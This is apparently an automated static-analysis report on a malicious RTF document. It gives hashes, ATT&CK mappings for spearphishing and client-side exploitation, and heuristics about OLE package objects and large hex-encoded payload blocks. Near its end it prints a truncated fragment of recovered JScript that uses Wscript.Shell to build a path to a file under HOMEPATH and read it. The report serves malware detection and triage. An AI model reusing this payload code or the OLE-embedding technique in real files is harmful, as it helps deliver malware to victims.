Malicious RTF — malware analysis report

Static analysis result for SHA-256 9daba4e7a7f9385d…

MALICIOUS

RTF

3.25 MB Created: 2017-12-10 23:21:00 First seen: 2019-05-16
MD5: fa1c548a5d691ac9ce7bfd929f204261 SHA-1: b8f52caa9e2ac66441b901bec557462318914e61 SHA-256: 9daba4e7a7f9385d0f16f87cc95d67c9581240ca9f3b0a65bd8b3ce907eee826
220 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The RTF file contains multiple OLE objects and a large amount of hex-encoded data within its objdata sections, which is a common technique for hiding malicious payloads. ClamAV identified the file as Win.Phishing.Suspicious-6355521-4, indicating a phishing attempt. The extracted artifact objdata_00_off00015c36.bin is likely the payload.

Heuristics 6

  • ClamAV: Win.Phishing.Suspicious-6355521-4 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Phishing.Suspicious-6355521-4
  • Package object class high RTF_OBJCLASS_PACKAGE
    OLE Package object — can wrap arbitrary files
  • Large hex data blocks in OLE object high RTF_EXCESSIVE_HEX
    RTF contains ~1710KB of hex-encoded data inside \objdata sections — may hide a payload
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • OLE object data medium RTF_OBJDATA
    RTF contains 2 \objdata section(s) — embedded OLE objects
  • Embedded OLE object medium RTF_OBJEMB
    RTF contains \objemb — embedded OLE object

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
objdata_00_off00015c36.bin rtf-objdata-decoded RTF \objdata at offset 0x15C36 810571 bytes
SHA-256: 95aeef35ed31964796c7262ff3c0529b998013e89cc0e5fe37e092f3f7a36ead
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): Wscript.Shell');p=esha.ExpandEnvironmentStrings('%%HOM'+'EPATH%%')+'\\mdo5.txt';var f=ofs.OpenTextFile(p,1,false);for(i=0;i^<4;i++)f.SkipLine();var com='';while(!f.AtE Carved artifact contains 7 shell/COM execution token(s).

Open this report in the interactive analyzer, or submit your own file for analysis.